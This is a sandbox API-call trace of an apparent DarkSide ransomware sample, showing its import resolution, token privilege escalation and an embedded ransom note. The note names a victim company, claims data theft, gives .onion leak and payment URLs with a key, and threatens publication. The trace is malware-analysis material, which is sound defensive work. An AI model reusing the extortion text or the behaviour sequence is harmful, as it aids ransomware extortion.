# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 24.01.2021 13:41:07.335 Process: id = "1" image_name = "cusersgrujadesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujadesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe" page_root = "0x49582000" os_pid = "0x6fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x568 [0055.531] LoadLibraryA (lpLibFileName="ntdll") returned 0x77c40000 [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="_wcsicmp") returned 0x77c79337 [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="_wcsnicmp") returned 0x77c6f63b [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="wcscpy") returned 0x77d156cd [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="wcscat") returned 0x77d1569a [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="wcsstr") returned 0x77c70c87 [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="wcsrchr") returned 0x77c77ee9 [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="wcslen") returned 0x77d156f1 [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="swprintf") returned 0x77d1550d [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0055.533] GetProcAddress (hModule=0x77c40000, lpProcName="LdrEnumerateLoadedModules") returned 0x77c7bf1f [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="RtlRandomEx") returned 0x77c801e3 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="RtlComputeCrc32") returned 0x77cfffc1 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="_allshr") returned 0x77c78990 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="_alldiv") returned 0x77cb8d00 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="NtQuerySystemInformation") returned 0x77c5fda0 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationFile") returned 0x77c5fa00 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationProcess") returned 0x77c5fac8 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="strlen") returned 0x77cbc4e0 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="sprintf") returned 0x77d153c3 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="RtlGetVersion") returned 0x77c7873a [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="RtlWow64EnableFsRedirectionEx") returned 0x77ca431a [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="NtAllocateVirtualMemory") returned 0x77c5fab0 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="NtProtectVirtualMemory") returned 0x77c60028 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationProcess") returned 0x77c5fb18 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitializeCriticalSection") returned 0x77c72c42 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="RtlEnterCriticalSection") returned 0x77c622b0 [0055.534] GetProcAddress (hModule=0x77c40000, lpProcName="RtlLeaveCriticalSection") returned 0x77c62270 [0055.535] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDeleteCriticalSection") returned 0x77c745f5 [0055.535] GetProcAddress (hModule=0x77c40000, lpProcName="RtlAllocateHeap") returned 0x77c6e026 [0055.535] GetProcAddress (hModule=0x77c40000, lpProcName="RtlReAllocateHeap") returned 0x77c81f6e [0055.535] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeHeap") returned 0x77c6df85 [0055.535] LoadLibraryA (lpLibFileName="kernel32") returned 0x76d30000 [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.535] GetProcAddress (hModule=0x76d30000, lpProcName="OpenMutexW") returned 0x76d45151 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexW") returned 0x76d4424c [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLangID") returned 0x76d5d5fd [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDefaultUILanguage") returned 0x76d62b22 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameW") returned 0x76d4d2f9 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableW") returned 0x76d41b48 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="CreateIoCompletionPort") returned 0x76d5eef2 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetQueuedCompletionStatus") returned 0x76d5d3c3 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="PostQueuedCompletionStatus") returned 0x76d5ef29 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0055.536] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadExecutionState") returned 0x76d5f747 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileExW") returned 0x76d59b2d [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0055.537] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeThread") returned 0x76d5d5b5 [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="RemoveDirectoryW") returned 0x76dc44cf [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryW") returned 0x76d51260 [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0055.538] GetProcAddress (hModule=0x76d30000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x76dc3f49 [0055.538] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenEx") returned 0x7771ca24 [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="ImpersonateLoggedOnUser") returned 0x7771c57a [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="EnumServicesStatusExW") returned 0x7771b466 [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0058.563] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="GetNamedSecurityInfoW") returned 0x7771f4fd [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="SetNamedSecurityInfoW") returned 0x77719fe2 [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="SetEntriesInAclW") returned 0x77722a66 [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RegFlushKey") returned 0x7773773f [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="RevertToSelf") returned 0x77721562 [0058.564] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0058.565] LoadLibraryA (lpLibFileName="shell32") returned 0x759d0000 [0063.943] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0063.943] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteW") returned 0x759e3c71 [0063.943] GetProcAddress (hModule=0x759d0000, lpProcName="IsUserAnAdmin") returned 0x75a244f5 [0063.943] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0063.944] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderPathW") returned 0x759f0468 [0063.944] GetProcAddress (hModule=0x759d0000, lpProcName="SHChangeNotify") returned 0x75a27965 [0063.944] LoadLibraryA (lpLibFileName="ole32") returned 0x76620000 [0065.213] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0065.214] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0065.214] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObject") returned 0x7667b68d [0065.214] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0065.214] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0065.214] GetProcAddress (hModule=0x76620000, lpProcName="CoSetProxyBlanket") returned 0x76635ea5 [0065.214] LoadLibraryA (lpLibFileName="oleaut32") returned 0x76e40000 [0065.746] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0065.746] LoadLibraryA (lpLibFileName="mpr") returned 0x75660000 [0065.922] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0065.922] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0065.922] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0065.922] LoadLibraryA (lpLibFileName="iphlpapi") returned 0x75640000 [0066.427] GetProcAddress (hModule=0x75640000, lpProcName="GetAdaptersInfo") returned 0x75649263 [0066.427] GetProcAddress (hModule=0x75640000, lpProcName="SendARP") returned 0x7564f456 [0066.427] LoadLibraryA (lpLibFileName="shlwapi") returned 0x772f0000 [0066.427] GetProcAddress (hModule=0x772f0000, lpProcName="PathIsDirectoryEmptyW") returned 0x7732cd81 [0066.428] GetProcAddress (hModule=0x772f0000, lpProcName="PathAddBackslashW") returned 0x7730c177 [0066.428] GetProcAddress (hModule=0x772f0000, lpProcName="PathIsNetworkPathW") returned 0x7730ae84 [0066.428] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0066.428] GetProcAddress (hModule=0x772f0000, lpProcName="PathIsUNCServerW") returned 0x772ffebf [0066.428] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveBackslashW") returned 0x77305c62 [0066.428] LoadLibraryA (lpLibFileName="gdi32") returned 0x770a0000 [0066.428] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFontW") returned 0x770bb600 [0066.428] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0066.428] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0066.428] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkColor") returned 0x770b52d8 [0066.428] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0066.428] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0066.429] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0066.429] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDIBSection") returned 0x770bac46 [0066.429] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0066.429] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0066.429] GetProcAddress (hModule=0x770a0000, lpProcName="SetTextColor") returned 0x770b522d [0066.429] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkMode") returned 0x770b51a2 [0066.429] GetProcAddress (hModule=0x770a0000, lpProcName="GetTextExtentPoint32W") returned 0x770bc107 [0066.429] LoadLibraryA (lpLibFileName="user32") returned 0x77130000 [0066.429] GetProcAddress (hModule=0x77130000, lpProcName="DrawTextW") returned 0x771525cf [0066.429] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0066.429] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0066.429] GetProcAddress (hModule=0x77130000, lpProcName="SystemParametersInfoW") returned 0x771490d3 [0066.429] LoadLibraryA (lpLibFileName="netapi32") returned 0x75610000 [0067.458] GetProcAddress (hModule=0x75610000, lpProcName="NetGetJoinInformation") returned 0x755d2c3f [0067.458] GetProcAddress (hModule=0x75610000, lpProcName="NetShareEnum") returned 0x755e3f33 [0067.458] LoadLibraryA (lpLibFileName="wsock32") returned 0x755c0000 [0067.838] GetProcAddress (hModule=0x755c0000, lpProcName="WSAStartup") returned 0x77233ab2 [0067.838] GetProcAddress (hModule=0x755c0000, lpProcName="WSACleanup") returned 0x77233c5f [0067.838] GetProcAddress (hModule=0x755c0000, lpProcName="gethostbyaddr") returned 0x77246c01 [0067.838] GetProcAddress (hModule=0x755c0000, lpProcName="inet_addr") returned 0x7723311b [0067.838] LoadLibraryA (lpLibFileName="wininet") returned 0x758d0000 [0070.443] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestW") returned 0x758f4a42 [0070.444] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestW") returned 0x758fba12 [0070.444] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0070.444] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectW") returned 0x758f492c [0070.444] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0070.444] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0070.444] GetProcAddress (hModule=0x758d0000, lpProcName="InternetQueryOptionW") returned 0x758e7ed7 [0070.444] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetOptionW") returned 0x758e7741 [0070.444] LoadLibraryA (lpLibFileName="wtsapi32") returned 0x755b0000 [0070.588] GetProcAddress (hModule=0x755b0000, lpProcName="WTSQueryUserToken") returned 0x755b1f81 [0070.588] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1a, ProcessInformation=0x3ff8f0, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x3ff8f0, ReturnLength=0x0) returned 0x0 [0070.588] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x35580) returned 0x4de678 [0070.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x204) returned 0x513c00 [0070.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x104) returned 0x513e10 [0070.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1e4) returned 0x513f20 [0070.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x14) returned 0x4d4dd8 [0070.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x24) returned 0x4dbb48 [0070.590] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x94) returned 0x514110 [0070.590] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x6e4) returned 0x5141b0 [0070.590] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x574) returned 0x5148a0 [0070.590] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x34) returned 0x514e20 [0070.590] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xc4) returned 0x514e60 [0070.590] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa94) returned 0x514f30 [0070.590] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0070.592] RtlComputeCrc32 (PartialCrc=0xffff, Buffer=0x514f30, Length=0xa8f) returned 0xbcbad978 [0070.592] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4de678) returned 1 [0070.592] NtSetInformationThread (ThreadHandle=0x0, ThreadInformationClass=0x1, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0xc0000003 [0070.593] IsUserAnAdmin () returned 1 [0070.594] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x3ff8f8 | out: TokenHandle=0x3ff8f8*=0xb8) returned 1 [0070.594] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x3, TokenInformation=0x3ff8f4, TokenInformationLength=0x4, ReturnLength=0x3ff8f0 | out: TokenInformation=0x3ff8f4, ReturnLength=0x3ff8f0) returned 0 [0070.594] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x118) returned 0x5159d0 [0070.594] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x3, TokenInformation=0x5159d0, TokenInformationLength=0x118, ReturnLength=0x3ff8f0 | out: TokenInformation=0x5159d0, ReturnLength=0x3ff8f0) returned 1 [0070.594] AdjustTokenPrivileges (in: TokenHandle=0xb8, DisableAllPrivileges=0, NewState=0x5159d0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0070.594] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5159d0) returned 1 [0070.594] CloseHandle (hObject=0xb8) returned 1 [0070.594] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x12, ProcessInformation=0xf51020, ProcessInformationLength=0x2) returned 0x0 [0070.594] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x21, ProcessInformation=0xf51020, ProcessInformationLength=0x4) returned 0x0 [0070.594] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3ff8f8 | out: TokenHandle=0x3ff8f8*=0xb8) returned 1 [0070.594] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x3ff7c0, TokenInformationLength=0x28, ReturnLength=0x3ff7e8 | out: TokenInformation=0x3ff7c0, ReturnLength=0x3ff7e8) returned 1 [0070.594] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x3ff7c8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x3ff86c, cchName=0x3ff8f0, ReferencedDomainName=0x3ff7ec, cchReferencedDomainName=0x3ff8ec, peUse=0x3ff8f4 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x3ff8f0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x3ff8ec, peUse=0x3ff8f4) returned 1 [0070.604] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x1a) returned 0x4dffb0 [0070.604] _wcsicmp (_Str1="XDUWTFONO", _Str2="NT AUTHORITY") returned 10 [0070.604] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4dffb0) returned 1 [0070.604] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x18) returned 0x4de940 [0070.604] _wcsicmp (_Str1="XDUWTFONO", _Str2="AUTORITE NT") returned 23 [0070.604] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4de940) returned 1 [0070.604] 